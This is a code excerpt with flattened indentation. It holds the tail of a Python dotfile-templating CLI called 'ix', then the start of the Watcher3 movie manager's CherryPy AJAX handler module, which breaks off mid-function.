list: All the files in the directory that contain the trigger
'''
ix_files = []
for root, _, files in os.walk(root):
for name in files:
if name.endswith('.ix'): continue
full_path = root + '/' + name
file = Parser.wrap_file(full_path)
if file:
ix_files.append(file)
return ix_files
@staticmethod
def process_file(file):
'''
        Go through the given file's contents and replace all the variables
        that have matches within the 'ixrc' configuration, remove every
        trace of 'ix' itself from the processed file, leaving it nice and
        clean, and add the processed file to the lock file so we don't
        have to process it again unless its contents change.
Parameters:
file (File): The file object to parse
'''
processed = file.parse()
if not file.rules:
regex = re.compile('^{}.+[\\s\\S]$'.format(file.notation), re.MULTILINE)
for line in re.findall(regex, processed):
processed = processed.replace(line, '')
try:
with open(file.get_output_path(), 'w') as f:
f.write(processed)
if file.has_custom_access:
os.chmod(file.get_output_path(), file.access)
lock_file[file.original_path] = file.to_dict()
except FileNotFoundError:
error('Could not find output path: {}.\n\tUsed in file: {}'.format(file.get_output_path(), file.original_path), True)
return
success('Saved: {1}{2}{0} to {1}{3}'.format(WHITE, RESET, file.original_path, file.get_output_path()), True)
class Helpers:
'''
List of all the helpers that can be used within files when
including variables and/or templating
Helpers can only be used within main variables, aka. '${{ thing.thing }}'
Parameters:
helper (str): The name of the helper function to run
value (str/int): The value to perform the function on
modifiers (dict): Extra parameters passed to the helper to further tweak the value
'''
@staticmethod
def call(helper, value, modifiers):
'''
Call a specific helper, if defined
'''
try:
method = getattr(Helpers, helper)
return method(value, **modifiers)
except Exception as e:
error(f'{e!r} ---- helper: {helper}')
return ''
@staticmethod
def rgb(value, alpha = None):
'''
Take a hex string ( #181b21 ) and convert it to 'rgb'.
If an rgb or rgba string is provided, if the opacity isn't
overwritten, it'll just return the string that was passed in.
If the opacity is overwritten, however, it'll replace the alpha
field within the given string.
Optionally, pass in opacity to override or add the alpha channel.
'''
# We got an rgb value
if not value.startswith('#'):
# Give it back as it is if no overrides are specified
if not alpha: return value
values = [ x.strip() for x in value.split('(', 1).pop().rstrip(')').split(',') ]
r = values[0]
g = values[1]
b = values[2]
a = alpha
return f'rgba({r}, {g}, {b}, {a})'
string = value.lstrip('#')
r, g, b = tuple(int(string[i:i+2], 16) for i in (0, 2, 4))
a = ''
if len(string) == 8:
a = round(int(string[6:6+2], 16) / 255, 2)
if alpha:
a = alpha
if a != '': tag = f'rgba({r}, {g}, {b}, {a})'
else: tag = f'rgb({r}, {g}, {b})'
return tag
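    # Examples, traced through the conversion above:
    # Helpers.rgb('#181b21')              -> 'rgb(24, 27, 33)'
    # Helpers.rgb('#181b21', alpha='0.5') -> 'rgba(24, 27, 33, 0.5)'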
@staticmethod
def hex(value, alpha = None, argb = None):
'''
Take an rgb/rgba string and convert it to a hex representation
of the same color. If a hex string is provided, it'll return the exact
same hex string unless the opacity is overwritten. If it is, it'll
replace the alpha field within the given string.
Optionally pass in opacity to override or add the alpha channel.
'''
if alpha:
alpha = hex(round(float(alpha) * 255))[2:]
# We got a hex string
if value.startswith('#'):
# Give it back as it is if no overrides are specified
if not alpha: return value
value = value[1:7]
if argb:
return f'#{alpha}{value}'
return f'#{value}{alpha}'
a = value.startswith('rgba')
value = value.split('(', 1).pop().rstrip(')').split(',')
r = hex(int(value[0]))[2:]
g = hex(int(value[1]))[2:]
b = hex(int(value[2]))[2:]
a = hex(round(float(value[3]) * 255))[2:] if a else ''
if alpha: a = alpha
if argb:
return f'#{a}{r}{g}{b}'
return f'#{r}{g}{b}{a}'
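    # Examples, mirroring the rgb() helper above:
    # Helpers.hex('rgb(24, 27, 33)')              -> '#181b21'
    # Helpers.hex('rgb(24, 27, 33)', alpha='0.5') -> '#181b2180'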
@staticmethod
def include(path):
'''
Include a given file directly into the current file.
This allows you to import/merge multiple files into one.
If the file you're importing is an ix compatible file,
it will be parsed, otherwise the plain text will be included.
Environment variables work, as well as ix variables.
'''
path = os.path.expandvars(path)
file = Parser.wrap_file(path)
# If it's not an ix file just read the contents
if not file:
with open(path) as f:
return f.read()
        # parse() reads the file and expands ix variables with its own prefix
        contents = file.parse()
return contents
@staticmethod
def uppercase(string):
'''
Turn a given string to uppercase.
Environment variables work, as well as ix variables.
'''
return string.upper()
@staticmethod
def lowercase(string):
'''
Turn a given string to lowercase.
Environment variables work, as well as ix variables.
'''
return string.lower()
class File:
'''
Structured class to keep track of everything about each
file that needs parsing. Such as the comment type,
the paths, the ix-configuration, and so on.
'''
def __init__(self, root, name, notation = '#', rules = None) -> None:
self.original_path = root + '/' + name
self.name = name
self.notation = notation
self.hash = ''
self.rules = rules
# Flags
self.has_custom_dir = False
self.has_custom_name = False
self.has_custom_access = False
# Config fields
self.to = root
self.prefix = '#'
self.access = ''
self.fields = {
'to': self.__set_to,
'out': self.__set_to,
'as': self.__set_as,
'name': self.__set_as,
'prefix': self.__set_prefix,
'access': self.__set_access
}
def get_output_path(self) -> str:
'''
Get the full (directory + filename) path for the current file.
Making sure to account for the location, and add an '.ix' extension
to the filename if the directory is the same as the original file.
We do not want to overwrite the original file.
Parameters:
self (File): The current file object
'''
extension = ''
# If no custom directory was defined
# and no custom filename was defined
# we add '.ix' to the original file name
# when saving so we don't overwrite the original
if not self.has_custom_dir:
if not self.has_custom_name:
extension = '.ix'
# If we have a custom directory
# we write to that directory, with whatever the current
# name is.
return self.to + '/' + self.name + extension
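    # Path resolution sketch: a file '/home/u/dots/foo.conf' with no 'to:' or
    # 'as:' fields is written back as '/home/u/dots/foo.conf.ix', while a
    # 'to: $HOME/.config' field would yield '$HOME/.config/foo.conf' (expanded).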
def load_field(self, field_tuple):
'''
Parse a given 'ix' configuration field. Usually comes in the following
format `out: /path/to/whatever`. Find out what item this configuration
field refers to and run the expected actions for said item.
Parameters:
self (File): The current file object
field (str): The field line directly from a file, with the comment stripped
'''
field, data = field_tuple
parse = self.fields.get(field, lambda x: 'No such field: ' + field)
if isinstance(data, str):
parse(data.strip())
else:
parse(data)
def __set_to(self, data):
'''
Update the directory that the processed file should be saved
to once done, making sure to create said directory if it
doesn't exist already and to expand any environment variables
or 'ix' variables within it.
This is used to parse a specific field from the ix configuration.
Parameters:
self (File): The current file object
data (str): The new output directory
'''
expanded = os.path.expandvars(data)
expanded = self.__unwrap_parse(Parser.expand_ix_vars(expanded, self.prefix))
# If the given directory does not exist
# we want to create it.
if not os.path.isdir(expanded):
info('{} does not exist, creating it for the following file: {}'.format(expanded, self.name), True)
os.makedirs(expanded)
self.has_custom_dir = True
self.to = expanded
def __set_as(self, data):
'''
Update the name that the processed file should have when it
gets saved to the file system.
This is used to parse a specific field from the ix configuration.
Parameters:
self (File): The current file object
data (str): The new file name + extension (if any)
'''
self.has_custom_name = True
self.name = self.__unwrap_parse(Parser.expand_ix_vars(data, self.prefix))
def __set_prefix(self, data):
'''
Replace the default prefix for this specific file.
This is used to parse a specific field from the ix configuration.
Parameters:
self (File): The current file object
data (str): The new prefix
'''
expanded = self.__unwrap_parse(Parser.expand_ix_vars(data, self.prefix))
self.prefix = expanded
def __set_access(self, data):
'''
Take in a decimal string of permissions in 'chmod' format
and turn them into an octal value instead since that is the
only format the python implementation of chmod will accept.
This is used to parse a specific field from the ix configuration.
Parameters:
self (File): The current file object
data (str): The permissions in 'chmod' format
'''
self.has_custom_access = True
# Turn the perms to octal since chmod only accepts that
expanded = self.__unwrap_parse(Parser.expand_ix_vars(data, self.prefix))
self.access = int(expanded, 8)
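        # e.g. an 'access: 644' field is stored as int('644', 8) == 420, the
        # octal form os.chmod() expects (equivalent to 0o644 / rw-r--r--).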
def __unwrap_parse(self, parsed):
'''
        Spread the tuple returned from an expansion of ix variables, making
        sure to display a message if some variables were not found.
Parameters:
self (File): The current instance
parsed (tuple): (parsed contents, unmatched variables)
'''
contents, unmatched = parsed
if unmatched:
variables = '\n\t'.join(unmatched)
warn(f'Could not find\n\t{ variables }\n in { self.original_path }\n', True)
return contents
def to_dict(self):
'''
Put everything about this file that we want to store in
the lock file within a dictionary
Parameters:
self (File): The current file object
'''
return {
'hash': self.hash_contents(),
'output': self.get_output_path(),
'created_at': str(datetime.now())
}
def hash_contents(self):
'''
        Hash the entire file contents in chunks rather than all at once,
        so that massive files don't eat up all the RAM.
The hash is later used to create unique identifiers for different purposes.
One of which is to store the hash in the lock file and later compare when
checking whether or not a file should be parsed again.
The hashing is done in md5 since it's fast and we really don't have to
        worry about collisions. The chances of the same file colliding are extremely
small.
Parameters:
self (File): The current file object
'''
if self.hash != '':
return self.hash
md5 = hashlib.md5()
with open(self.original_path, 'rb') as bytes:
while True:
data = bytes.read(65536)
if not data:
break
md5.update(data)
digest = md5.hexdigest()
self.hash = digest
return digest
def parse(self):
'''
Parse the contents of the file, replacing
all variables with their defined values.
Parameters:
            self (File): The current file object
'''
with open(self.original_path, 'r') as f:
contents = self.__unwrap_parse(Parser.expand_ix_vars(f.read(), self.prefix))
return contents
# __ _ _
# / _|_ _ _ __ ___| |_(_) ___ _ __ ___
# | |_| | | | '_ \ / __| __| |/ _ \| '_ \/ __|
# | _| |_| | | | | (__| |_| | (_) | | | \__ \
# |_| \__,_|_| |_|\___|\__|_|\___/|_| |_|___/
# -------------------------------------------------------------------------
def out(message, forced = False):
if forced or verbose:
print(message)
def info(message, f = False): out(CYAN + 'ℹ ' + WHITE + message + RESET, f)
def error(message, f = False): out(RED + '✖ ' + message + RESET, f)
def warn(message, f = False): out(YELLOW + '⚠ ' + WHITE + message + RESET, f)
def success(message, f = False): out(GREEN + '✔ ' + WHITE + message + RESET, f)
def log(message, f = False): out(MAGENTA + '~ ' + WHITE + message + RESET, f)
def get_file_lines(file_path):
'''
Try and open a file as a normal text file.
    If successful, return a list of all the lines
inside that file.
'''
try:
# Try and open the file as a normal text file
# Abort if it's binary or something else
file = open(file_path, 'r')
lines = list(file)
file.close()
return lines
except PermissionError:
info('No permission to access file, ignoring: ' + file_path)
return None
except:
info('Found non-text file, ignoring: ' + file_path)
return None
def read_config(at):
'''
    Read the 'ix' configuration from its specific path.
Either user defined, or the default one. Use config parser
to load and resolve all the magic that the .ini format provides.
Parameters:
at (str): The exact path to the config file
'''
config = configparser.ConfigParser()
config._interpolation = configparser.ExtendedInterpolation()
config.read(at)
return config
def read_lock_file(path):
'''
Read a JSON file into a dictionary allowing us to do
quick lookups for specific files whenever we need to check
if one was already parsed or not, allowing us to skip part of the
process.
Parameters:
path (str): The directory of the lock file
'''
try:
file = open(path + '/ix.lock')
contents = json.loads(file.read())
file.close()
return contents
except FileNotFoundError:
# Start fresh if the file doesn't exist
return {}
def save_lock_file(path, data):
'''
Save a dictionary full of all parsed files to a file.
This will be used later on when 'ix' runs again in order
to check which files have changed and only re-process those files.
Giving a bit of a performance boost in very large directories.
Parameters:
path (str): The directory of the lock file
data (dict): Dictionary full of all the file data that we care about saving
'''
if not os.path.isdir(path):
os.makedirs(path)
with open(path + '/ix.lock', 'w') as lock:
lock.write(json.dumps(data))
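# Lock file shape, one entry per processed file (see File.to_dict above):
# { "/path/to/source.conf": { "hash": "<md5>", "output": "/path/to/out.conf",
#                             "created_at": "2021-01-01 12:00:00.000000" } }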
def cleanup():
'''
Attempt to remove all the files that were previously
processed and stored in the cache, making sure to
clear the cache when done so we're starting fresh.
'''
lock = read_lock_file(lock_path)
info('Purging all previous builds...', True)
    if lock == {}:
        log('Found no items in cache, exiting...', True)
        return
for _, entry in lock.items():
file = entry['output']
try:
os.remove(file)
log(f'\tRemoved: {file}')
except Exception as e:
error(f"Couldn't remove: {file} - {e!r}")
save_lock_file(lock_path, {})
success('Done', True)
def main(rules = None):
'''
The main entrypoint for the program.
Initializes everything that needs to happen.
From finding all the 'ix' files to creating new Threads for
parsing each of the available files, as well as saving and updating
the lock file once everything has been processed.
Args:
        rules (dict): Optional parsing rules loaded from a rules file
'''
threads = list()
if rules:
files = list()
for f in rules['parse']:
root, name = f['file'].rsplit('/', 1)
if not os.path.isfile(f['file']):
error('Could not find file: ' + f['file'])
continue
file = File(root, name, rules = f)
for field in f.items():
file.load_field(field)
files.append(file)
else:
files = Parser.find_ix(root_path)
unchanged = 0
saved = 0
if len(files) > 0:
info('Found {} ix compatible files'.format(len(files)))
else:
log('Found no ix compatible files in: {}.'.format(root_path))
log('Exiting.')
return
for file in files:
if file.original_path in lock_file:
hash = file.hash_contents()
lock = lock_file[file.original_path]
# Don't run for files that haven't changed
if lock and hash == lock['hash']:
unchanged += 1
continue
thread = threading.Thread(target=Parser.process_file, args=(file,))
threads.append(thread)
thread.start()
saved += 1
for thread in threads:
thread.join()
# Logging
if saved > 0:
success('Saved {} files'.format(saved), True)
if unchanged > 0:
log('Skipped {} files because they were unchanged'.format(unchanged))
# Cache all the parsed files
save_lock_file(lock_path, lock_file)
# __ _ _ _
# ___ ___ _ __ / _(_) __ _ _ _ _ __ __ _| |_(_) ___ _ __
# / __/ _ \| '_ \| |_| |/ _` | | | | '__/ _` | __| |/ _ \| '_ \
# | (_| (_) | | | | _| | (_| | |_| | | | (_| | |_| | (_) | | | |
# \___\___/|_| |_|_| |_|\__, |\__,_|_| \__,_|\__|_|\___/|_| |_|
# |___/
# -------------------------------------------------------------------------
# Symbol configurations
notation = ':'
trigger = 'ix-config'
entries = [ '//', '#', '--', '--[', '/*', '*' ]
sequence = [ '{{', '}}' ]
# Directory configurations
root_path = os.path.expandvars('$HOME/dots')
config_path = os.path.expandvars('$HOME/.config/ix/ixrc')
lock_path = os.path.expandvars('$HOME/.cache/ix')
lock_file = None
config = None
# Commandline arguments
parser = argparse.ArgumentParser(description='Find and replace variables in files within a given directory')
parser.add_argument('-c', '--config', help='The path where the .ix configuration is located. Default $HOME/.config/ix/ixrc')
parser.add_argument('-r', '--rules', help='File that contains a list of all files to be parsed and included. Used instead of the #ix-config header in each individual file')
parser.add_argument('-d', '--directory', help='The directory to parse. Default $HOME/dots')
parser.add_argument('-f', '--field', help='Get a specific field value from the config')
parser.add_argument('--full', help='Skip looking at the cache and parse everything', action='store_false')
parser.add_argument('--reverse', help='Remove all the parsed files (everything defined in the cache)', action='store_true')
parser.add_argument('-v', '--verbose', help='Output extra information about what is happening', action='store_true')
args = parser.parse_args()
json_rules = None
if args.rules:
with open(args.rules) as file:
json_rules = json.load(file)
if args.verbose:
    verbose = True
if args.config:
if args.rules:
config_path = json_rules['vars_file']
else:
config_path = args.config
if args.field:
config = read_config(config_path)
contents = Parser.get_main_key_value(args.field)
print(contents)
# The whole thing doesn't need to run
# if only one field is needed
exit()
if args.directory:
if args.rules:
root_path = pathlib.Path(os.path.expandvars(json_rules['root'])).absolute()
else:
root_path = pathlib.Path(os.path.expandvars(args.directory)).absolute()
# Load in the cache if not specified
# otherwise.
if not args.full:
lock_file = {}
else:
lock_file = read_lock_file(lock_path)
# Load in the config
config = read_config(config_path)
# Run
if __name__ == '__main__':
# Windows handles colors weirdly by default
if os.name == 'nt':
os.system('color')
if not args.full:
info('Skipping cache, doing a full parse...', True)
cleanup()
if args.reverse:
cleanup()
main(rules = json_rules)
``` |
{
"source": "0x20Man/Watcher3",
"score": 2
} |
#### File: Watcher3/core/ajax.py
```python
import json
import logging
import os
import threading
import time
import cherrypy
import datetime
import core
from core import config, library, searchresults, searcher, snatcher, notification, plugins, downloaders
from core.library import Metadata, Manage
from core.movieinfo import TheMovieDatabase, YouTube
from core.providers import torrent, newznab
from core.helpers import Conversions
import backup
from gettext import gettext as _
logging = logging.getLogger(__name__)
class Errors():
''' Namespace for common error messages used in AJAX responses '''
database_write = _('Unable to write to database.')
database_read = _('Unable to read {} details from database.')
tmdb_not_found = _('Unable to find {} on TheMovieDB.')
class Ajax(object):
''' These are all the methods that handle ajax post/get requests from the browser.
Except in special circumstances, all should return an 'ajax-style response', which is a
dict with a response key to indicate success, and additional keys for expected data output.
For example {'response': False, 'error': 'something broke'}
{'response': True, 'results': ['this', 'is', 'the', 'output']}
'''
@cherrypy.expose
@cherrypy.tools.json_out()
def library(self, sort_key, sort_direction, limit=50, offset=0, hide_finished=False):
''' Get 50 movies from library
sort_key (str): column name to sort by
sort_direction (str): direction to sort [ASC, DESC]
limit: int number of movies to get <optional - default 50>
            offset: int list index position to start slice <optional - default 0>
hide_finished (bool): get finished/disabled movies or not
hide_finished will be converted to bool if string is passed
Gets a 25-movie slice from library sorted by sort key
Returns list of dicts of movies
'''
return core.sql.get_user_movies(sort_key, sort_direction.upper(), limit, offset, hide_finished=True if hide_finished == 'True' else False)
@cherrypy.expose
@cherrypy.tools.json_out()
def search_tmdb(self, search_term):
''' Search tmdb for movies
search_term (str): title and year of movie (Movie Title 2016)
Returns list of dicts that contain tmdb's data.
'''
results = TheMovieDatabase.search(search_term)
if not results:
logging.info('No Results found for {}'.format(search_term))
return results
@cherrypy.expose
@cherrypy.tools.json_out()
def tmdb_categories(self, cat, tmdbid=None):
''' Get categories of movies from TMDB
Returns list of dicts of movies
'''
return TheMovieDatabase.get_category(cat, tmdbid)[:8]
@cherrypy.expose
@cherrypy.tools.json_out()
def quick_titles(self):
return core.sql.quick_titles()
@cherrypy.expose
@cherrypy.tools.json_out()
def get_search_results(self, imdbid, quality=None):
''' Gets search results for movie
imdbid (str): imdb id #
quality (str): quality profile for movie <optional - default None>
Passes request to sql.get_search_results() then filters out unused download methods.
Returns dict ajax-style response
'''
results = core.sql.get_search_results(imdbid, quality=quality)
if not core.CONFIG['Downloader']['Sources']['usenetenabled']:
results = [res for res in results if res.get('type') != 'nzb']
if not core.CONFIG['Downloader']['Sources']['torrentenabled']:
results = [res for res in results if res.get('type') != 'torrent']
if not results:
ne = core.scheduler_plugin.task_list['Movie Search'].next_execution
ne = Conversions.human_datetime(ne) if ne else '[Disabled]'
return {'response': False, 'next': ne}
else:
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
return {'response': True, 'results': results}
@cherrypy.expose
def get_trailer(self, title, year):
''' Gets trailer embed url from youtube
title (str): title of movie
year (str/int): year of movie release
Returns str
'''
return YouTube.trailer('{} {}'.format(title, year))
@cherrypy.expose
@cherrypy.tools.json_out()
def add_wanted_movie(self, data):
''' Adds movie to library
data (str): json-formatted dict of known movie data
Calls library.Manage.add_movie to add to library.
Returns dict ajax-style response
'''
movie = json.loads(data)
response = Manage.add_movie(movie, full_metadata=False)
if response['response'] and core.CONFIG['Search']['searchafteradd'] and movie['year'] != 'N/A':
threading.Thread(target=searcher._t_search_grab, args=(movie,)).start()
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def save_settings(self, data):
''' Saves settings to config file
            data (dict): dict of sections, each a nested dict of keys and values:
{'Section': {'key': 'val', 'key2': 'val2'}, 'Section2': {'key': 'val'}}
All dicts must contain the full tree or data will be lost.
        Fires off additional methods if necessary, i.e. scheduler restart/reloads
Returns dict ajax-style response
'''
logging.info('Saving settings.')
data = json.loads(data)
save_data = {}
for key in data:
if data[key] != core.CONFIG[key]:
save_data[key] = data[key]
if not save_data:
return {'response': True, 'message': _('Settings saved.')}
try:
config.write(save_data)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Writing config.', exc_info=True)
return {'response': False, 'error': _('Unable to write to config file.')}
return {'response': True, 'message': _('Settings saved.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def remove_movie(self, imdbid):
''' Removes movie
imdbid (str): imdb id #
Returns dict ajax-style response
'''
return Manage.remove_movie(imdbid)
@cherrypy.expose
@cherrypy.tools.json_out()
def delete_movie_file(self, imdbid):
''' Deletes movie file for imdbid
imdbid (str): imdb id #
Returns dict ajax-style response
'''
logging.info('Deleting file for {}.'.format(imdbid))
f = core.sql.get_movie_details('imdbid', imdbid).get('finished_file')
try:
logging.debug('Finished file for {} is {}'.format(imdbid, f))
os.unlink(f)
return {'response': True, 'message': _('Deleted movie file {}.').format(f)}
except Exception as e:
logging.error('Unable to delete file {}'.format(f), exc_info=True)
return {'response': False, 'error': str(e)}
@cherrypy.expose
@cherrypy.tools.json_out()
def search(self, imdbid):
''' Search indexers for specific movie.
imdbid (str): imdb id #
Gets movie data from database and sends to searcher.search()
Returns dict ajax-style response
'''
logging.info('Starting user-requested backlog search for {}'.format(imdbid))
movie = core.sql.get_movie_details('imdbid', imdbid)
if not movie:
return {'response': False, 'error': Errors.database_read.format(imdbid)}
else:
success = searcher.search(imdbid, movie['title'], movie['year'], movie['quality'])
status = core.sql.get_movie_details('imdbid', imdbid)['status']
if success:
results = core.sql.get_search_results(imdbid, movie['quality'])
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
r = {'response': True, 'results': results, 'movie_status': status}
if len(results) == 0:
ne = core.scheduler_plugin.task_list['Movie Search'].next_execution
r['next'] = Conversions.human_datetime(ne) if ne else '[Disabled]'
return r
else:
return {'response': False, 'error': Errors.database_read.format(imdbid), 'movie_status': status}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_download(self, year, guid, kind):
''' Sends search result to downloader manually
guid (str): download link for nzb/magnet/torrent file.
kind (str): type of download (torrent, magnet, nzb)
Returns dict ajax-style response
'''
torrent_enabled = core.CONFIG['Downloader']['Sources']['torrentenabled']
usenet_enabled = core.CONFIG['Downloader']['Sources']['usenetenabled']
if kind == 'nzb' and not usenet_enabled:
            return {'response': False, 'error': _('Link is NZB but no Usenet client is enabled.')}
elif kind in ('torrent', 'magnet') and not torrent_enabled:
return {'response': False, 'error': _('Link is Torrent/Magnet but no Torrent client is enabled.')}
data = dict(core.sql.get_single_search_result('guid', guid))
if data:
data['year'] = year
return snatcher.download(data)
else:
return {'response': False, 'error': Errors.database_read.format(kind)}
@cherrypy.expose
@cherrypy.tools.json_out()
def mark_bad(self, guid, imdbid, cancel_download=False):
''' Marks guid as bad in SEARCHRESULTS and MARKEDRESULTS
guid (str): guid of download to mark
imdbid (str): imdb id # of movie
cancel_download (bool): send command to download client to cancel download
Returns dict ajax-style response
'''
sr_orig = core.sql.get_single_search_result('guid', guid)
sr = Manage.searchresults(guid, 'Bad')
Manage.markedresults(guid, 'Bad', imdbid=imdbid)
if sr:
response = {'response': True, 'message': _('Marked release as Bad.')}
else:
response = {'response': False, 'error': Errors.database_write}
response['movie_status'] = Manage.movie_status(imdbid)
if not response['movie_status']:
        response['error'] = Errors.database_write
response['response'] = False
if cancel_download:
cancelled = False
if sr_orig.get('status') != 'Snatched':
return response
client = sr_orig['download_client'] if sr_orig else None
downloadid = sr_orig['downloadid'] if sr_orig else None
if not client:
logging.info('Download client not found, cannot cancel download.')
return response
else:
cancelled = getattr(downloaders, client).cancel_download(downloadid)
if not cancelled:
response['response'] = False
response['error'] = response.get('error', '') + _(' Could not remove download from client.')
return response
@cherrypy.expose
def notification_remove(self, index):
''' Removes notification from core.notification
index (str/int): index of notification to remove
'index' will be of type string since it comes from ajax request.
Therefore we convert to int here before passing to Notification
Simply calls Notification module.
Does not return
'''
notification.remove(int(index))
return
@cherrypy.expose
@cherrypy.tools.json_out()
def update_check(self):
''' Manually check for updates
Returns list:
[0] dict ajax-style response
[1] dict of core notifications
'''
response = core.updater.update_check()
if response['status'] == 'current':
n = [[{'message': _('No updates available.')}, {'type': 'primary'}]]
return [response, n]
else:
return [response, core.NOTIFICATIONS]
@cherrypy.expose
@cherrypy.tools.json_out()
def test_downloader_connection(self, mode, data):
''' Test connection to downloader.
mode (str): which downloader to test.
data (dict): connection information (url, port, login, etc)
Executes staticmethod in the chosen downloader's class.
Returns dict ajax-style response
'''
response = {}
data = json.loads(data)
test = getattr(downloaders, mode).test_connection(data)
if test is True:
response['response'] = True
response['message'] = _('Connection successful.')
else:
response['response'] = False
response['error'] = test
return response
@cherrypy.expose
def server_status(self, mode):
''' Check or modify status of CherryPy server_status
mode (str): command or request of state
Restarts or Shuts Down server in separate thread.
Delays by one second to allow browser to redirect.
If mode == 'online', asks server for status.
(ENGINE.started, ENGINE.stopped, etc.)
Returns nothing for mode == restart || shutdown
Returns str server state if mode == online
'''
if mode == 'restart':
threading.Timer(1, core.restart).start()
return
elif mode == 'shutdown':
threading.Timer(1, core.shutdown).start()
return
elif mode == 'online':
return str(cherrypy.engine.state)
@cherrypy.expose
def update_server(self, mode):
''' Starts and executes update process.
mode (str): 'set_true' or 'update_now'
This method has two major functions based on mode
set_true:
Sets core.UPDATING to True, the browser should then automatically redirect
the user to the update page that calls update_server('update_now')
update_now:
Starts update process:
* Stops task scheduler to cancel all Timers
* Waits for in-process tasks to finish. Yields to browser a list of
currently-running tasks every 1.5 seconds
* Yields updating message to browser. Calls update method
* Sets core.UPDATING to False
* Yields response from update method to browser
If False, starts scheduler plugin again to get back to a normal state
If True, calls restart method. Browser is responsible for redirecting
after the server is back up.
Returns dict ajax-style response
'''
if mode == 'set_true':
core.UPDATING = True
yield json.dumps({'response': True})  # yield, not return: this method is a generator
return
if mode == 'update_now':
logging.info('Update process started.')
core.scheduler_plugin.stop()
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
while len(active_tasks) > 0:
yield json.dumps({'response': True, 'status': 'waiting', 'active_tasks': active_tasks})
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
time.sleep(1.5)
yield json.dumps({'response': True, 'status': 'updating'})
update_status = core.updater.execute_update()
core.UPDATING = False
if update_status is False:
logging.error('Update Failed.')
yield json.dumps({'response': False, 'error': _('Unable to complete update.')})
core.scheduler_plugin.restart()
elif update_status is True:
yield json.dumps({'response': True, 'status': 'complete'})
self.server_status('restart')
else:
yield json.dumps({'response': False})
update_server._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def update_movie_options(self, quality, status, filters, imdbid):
''' Updates quality settings for individual title
quality (str): name of new quality
status (str): management state ('automatic', 'disabled')
filters (str): JSON.stringified dict of filter words
imdbid (str): imdb identification number
Returns dict ajax-style response
'''
success = {'response': True, 'message': _('Movie options updated.')}
logging.info('Setting Quality and filters for {}.'.format(imdbid))
if not core.sql.update_multiple_values('MOVIES', {'quality': quality, 'filters': filters}, 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
logging.info('Updating status to {} for {}.'.format(status, imdbid))
if status == 'Automatic':
if not core.sql.update('MOVIES', 'status', 'Waiting', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
new_status = Manage.movie_status(imdbid)
if not new_status:
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = new_status
return success
elif status == 'Disabled':
if not core.sql.update('MOVIES', 'status', 'Disabled', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = 'Disabled'
return success
@cherrypy.expose
def get_log_text(self, logfile):
''' Gets log file contents
logfile (str): name of log file to read
logfile should be filename only, not the path to the file
Returns str
'''
logging.info('Dumping log file {} to text.'.format(logfile))
with open(os.path.join(core.LOG_DIR, logfile), 'r') as f:
log_text = ''.join(reversed(f.readlines()))
return log_text
@cherrypy.expose
@cherrypy.tools.json_out()
def indexer_test(self, indexer, apikey, mode):
''' Tests connection to newznab indexer
indexer (str): url of indexer
apikey (str): indexer's api key
mode (str): newznab or torznab
Returns dict ajax-style response
'''
if mode == 'newznab':
return newznab.NewzNab.test_connection(indexer, apikey)
elif mode == 'torznab':
return torrent.Torrent.test_connection(indexer, apikey)
else:
return {'response': False, 'error': _('Invalid test mode.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_plugin_conf(self, folder, conf):
''' Calls plugin_conf_popup to render html
folder (str): folder to read config file from
conf (str): filename of config file (ie 'my_plugin.conf')
Returns string
'''
c = os.path.join(core.PLUGIN_DIR, folder, conf)
logging.info('Reading plugin config {}'.format(c))
try:
with open(c) as f:
config = json.load(f)
except Exception as e:
logging.error('Unable to read config file.', exc_info=True)
return ''
return plugins.render_config(config)
@cherrypy.expose
@cherrypy.tools.json_out()
def save_plugin_conf(self, folder, filename, config):
''' Calls plugin_conf_popup to render html
folder (str): folder to store config file
filename (str): filename of config file (ie 'my_plugin.conf')
config (str): json data to store in conf file
Returns dict ajax-style response
'''
conf_file = os.path.join(core.PROG_PATH, core.PLUGIN_DIR, folder, filename)
logging.info('Saving plugin config as {}'.format(conf_file))
config = json.loads(config)
response = {'response': True, 'message': _('Settings saved.')}
try:
with open(conf_file, 'w') as output:
json.dump(config, output, indent=2)
except Exception as e:
response = {'response': False, 'error': str(e)}
return response
@cherrypy.expose
def scan_library_directory(self, directory, minsize, recursive):
''' Calls library to scan directory for movie files
directory (str): directory to scan
minsize (str/int): minimum file size in mb, coerced to int
recursive (bool): whether or not to search subdirs
Finds all files larger than minsize in directory.
Removes all movies from gathered list that are already in library.
If error, yields {'error': reason} and stops iteration
If movie has all metadata, yields:
{'complete': {<metadata>}}
If missing imdbid or resolution, yields:
{'incomplete': {<known metadata>}}
All metadata dicts include:
'path': 'absolute path to file'
'progress': '10 of 250'
Yields dict ajax-style response
'''
recursive = json.loads(recursive)
minsize = int(minsize)
files = core.library.ImportDirectory.scan_dir(directory, minsize, recursive)
if files.get('error'):
yield json.dumps({'error': files['error']})
return  # do not raise StopIteration inside a generator (PEP 479)
library = [i['imdbid'] for i in core.sql.get_user_movies()]
files = files['files']
length = len(files)
if length == 0:
yield json.dumps({'response': None})
return
logging.info('Parsing {} directory scan results.'.format(length))
for index, path in enumerate(files):
logging.info('Gathering metadata for {}'.format(path))
metadata = {}
response = {'progress': [index + 1, length]}
try:
metadata = Metadata.from_file(path)
if not metadata.get('imdbid'):
metadata['imdbid'] = ''
logging.info('IMDB unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
elif metadata['imdbid'] in library:
logging.info('{} ({}) already in library, ignoring.'.format(metadata['title'], path))
response['response'] = 'in_library'
elif not metadata.get('resolution'):
logging.info('Resolution/Source unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
else:
logging.info('All data found for import {}'.format(metadata['title']))
response['response'] = 'complete'
if response['response'] == 'complete':
p = metadata.get('poster_path')
r = metadata.get('resolution')
